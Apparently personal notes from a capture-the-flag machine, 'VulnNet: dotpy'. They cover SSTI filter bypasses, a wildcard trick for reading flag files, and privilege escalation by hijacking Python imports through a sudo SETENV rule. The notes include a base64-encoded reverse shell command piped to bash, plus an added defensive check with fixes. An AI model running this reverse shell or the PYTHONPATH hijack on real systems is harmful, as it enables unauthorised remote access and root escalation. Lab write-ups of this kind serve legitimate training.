1. Completed VulnNet: dotpy
    1. Learned about SSTI filter bypasses
    2. Also, don't underestimate the power of encoding your commands
      1. echo%20YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xNC4xNC43OC84MCAwPiYx|base64%20-d|bash
      2. This was the command used to get the reverse shell
    3. Sometimes a file has an extension (e.g. flag.txt) but the '.' character (period) is blocked. In that case, try the wildcard character '*'
      1. cat flag*
      2. This will cat every file whose name starts with 'flag', so flag.txt is printed as well.
    4. Python Library hijacking
      1. Using SETENV

        1. If a sudo rule allows us to set environment variables (SETENV), we may be able to escalate privileges.
        2. Python searches a fixed, ordered list of directories when importing modules.
        3. We can use SETENV to change the PYTHONPATH variable to something like /dev/shm, where we can put a malicious file with the name of the imported module (e.g. sys.py, requests.py, etc.).
        4. To change the PYTHONPATH and execute, we can use sudo PYTHONPATH=/dev/shm /usr/bin/python3 /opt/backup.py
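
The PYTHONPATH behaviour described above, seen from the defender's side. This is an added example, not part of the original notes: it checks whether a child interpreter resolves a module from a PYTHONPATH directory by default, and again when started with -E or -I, which make Python ignore PYTHONPATH. The module name and the temporary directory are constructed stand-ins.

```python
import os
import subprocess
import sys
import tempfile

MODULE = "demo_shadow_mod"  # hypothetical module name, constructed for this example

# Code run in the child interpreter: report where MODULE would be loaded from.
# find_spec only locates the module; it does not execute it.
CHILD = (
    "import importlib.util\n"
    f"spec = importlib.util.find_spec({MODULE!r})\n"
    "print(spec.origin if spec else 'NOT_FOUND')\n"
)


def import_origin(pythonpath, flags=()):
    """Return the file a child interpreter would load MODULE from, or None."""
    env = dict(os.environ, PYTHONPATH=pythonpath)
    out = subprocess.run(
        [sys.executable, *flags, "-c", CHILD],
        env=env, capture_output=True, text=True, check=True,
    ).stdout.strip()
    return None if out == "NOT_FOUND" else out


def compare_modes():
    """Resolve MODULE with PYTHONPATH honoured, then with -E and with -I."""
    with tempfile.TemporaryDirectory() as d:
        # Harmless stand-in for a writable directory such as /dev/shm.
        with open(os.path.join(d, MODULE + ".py"), "w") as f:
            f.write("VALUE = 'loaded from PYTHONPATH'\n")
        return {
            "default": import_origin(d) is not None,
            "-E": import_origin(d, ["-E"]) is not None,   # ignore PYTHON* variables
            "-I": import_origin(d, ["-I"]) is not None,   # isolated mode (implies -E)
        }


if __name__ == "__main__":
    for mode, found in compare_modes().items():
        print(f"{mode:8} module resolved via PYTHONPATH: {found}")
```

For a script run through sudo, the matching fixes are to drop the SETENV tag from the sudoers rule and to invoke the interpreter with -I (or -E) in the permitted command line.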